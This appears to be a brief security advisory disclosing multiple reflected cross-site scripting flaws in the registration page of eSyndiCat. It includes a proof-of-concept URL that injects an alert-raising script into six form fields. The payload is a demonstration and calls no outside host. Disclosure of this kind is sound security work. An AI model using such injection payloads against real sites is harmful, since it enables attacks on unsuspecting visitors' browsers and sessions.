eSyndiCat 'register.php' Multiple Cross Site Scripting Vulnerabilities

eSyndiCat 'register.php' Multiple Cross Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following proof of concept is available:

http://www.example.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>&register="><script>alert(12157312.477)</script>